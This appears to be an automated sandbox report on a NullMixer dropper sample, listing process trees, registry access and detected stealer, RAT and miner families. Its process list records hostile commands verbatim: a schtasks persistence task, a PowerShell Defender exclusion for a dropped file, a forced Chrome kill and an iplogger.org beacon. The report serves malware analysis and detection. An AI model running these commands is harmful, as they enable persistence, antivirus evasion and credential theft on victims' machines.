PID 2536 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2536 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2536 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2536 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2300 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe
PID 2300 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe
PID 2300 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe
PID 2300 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe
PID 2300 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe
PID 2300 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe
PID 2300 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe
PID 2248 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2248 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2248 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2248 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2248 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2248 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2248 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2248 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2248 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2248 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2248 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2248 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2248 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2248 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2528 wrote to memory of 2704 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\08240101651be7e1.exe
PID 2528 wrote to memory of 2704 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\08240101651be7e1.exe
PID 2764 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe
PID 2704 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\08240101651be7e1.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
PID 2248 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2248 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2248 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 08240101651be7e1.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 9aa6e16872.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 1710990cbc64.exe

C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\08240101651be7e1.exe

08240101651be7e1.exe

C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe

9aa6e16872.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 53516815d3135fe3.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c c862a054a35.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 4f5baa1083db067.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c f34b9ab9db6d16.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c e4b2f18fb52218.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 453c5fa76a849.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 08240101651be7e010.exe

C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\c862a054a35.exe

c862a054a35.exe

C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\453c5fa76a849.exe

453c5fa76a849.exe

C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\4f5baa1083db067.exe

4f5baa1083db067.exe

C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\1710990cbc64.exe

1710990cbc64.exe

C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\53516815d3135fe3.exe

53516815d3135fe3.exe

C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\e4b2f18fb52218.exe

e4b2f18fb52218.exe

C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\08240101651be7e010.exe

08240101651be7e010.exe

C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\f34b9ab9db6d16.exe

f34b9ab9db6d16.exe

C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\53516815d3135fe3.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\53516815d3135fe3.exe"

C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\1710990cbc64.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\1710990cbc64.exe" -a

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1732527218 0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2248 -s 432

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\7zS843D.tmp\Install.cmd" "

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/16B4c7

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1996 CREDAT:275457 /prefetch:2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

Network

Files

Analysis: behavioral2

Detonation Overview

Submitted 2024-11-25 09:33
Reported 2024-11-25 09:36
Platform win10v2004-20241007-en
Max time kernel 150s
Max time network 150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe"

Signatures

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Sectoprat family

sectoprat

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Vidar

stealer vidar

Vidar family

vidar

Xmrig family

xmrig

xmrig

miner xmrig

Vidar Stealer

stealer

XMRig Miner payload

miner

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\1710990cbc64.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\08240101651be7e010.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\services64.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\4f5baa1083db067.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\1710990cbc64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\08240101651be7e1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\53516815d3135fe3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\c862a054a35.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\453c5fa76a849.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\f34b9ab9db6d16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\e4b2f18fb52218.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\08240101651be7e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Windows\winnetdriv.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses 2FA software files, possible credential harvesting

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\08240101651be7e1.exe N/A

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\manifest.json C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A api.db-ip.com N/A N/A

Looks up geolocation information via web service

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4464 set thread context of 1428 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
PID 2828 set thread context of 5188 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\1710990cbc64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\08240101651be7e010.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\xcopy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\winnetdriv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\453c5fa76a849.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\e4b2f18fb52218.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\f34b9ab9db6d16.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\453c5fa76a849.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\453c5fa76a849.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\453c5fa76a849.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\e4b2f18fb52218.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\e4b2f18fb52218.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\e4b2f18fb52218.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\f34b9ab9db6d16.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\4f5baa1083db067.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\c862a054a35.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3160 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1540 wrote to memory of 396 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe
PID 396 wrote to memory of 3544 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 396 wrote to memory of 4596 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 396 wrote to memory of 4932 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 396 wrote to memory of 4620 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 396 wrote to memory of 328 N/A C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
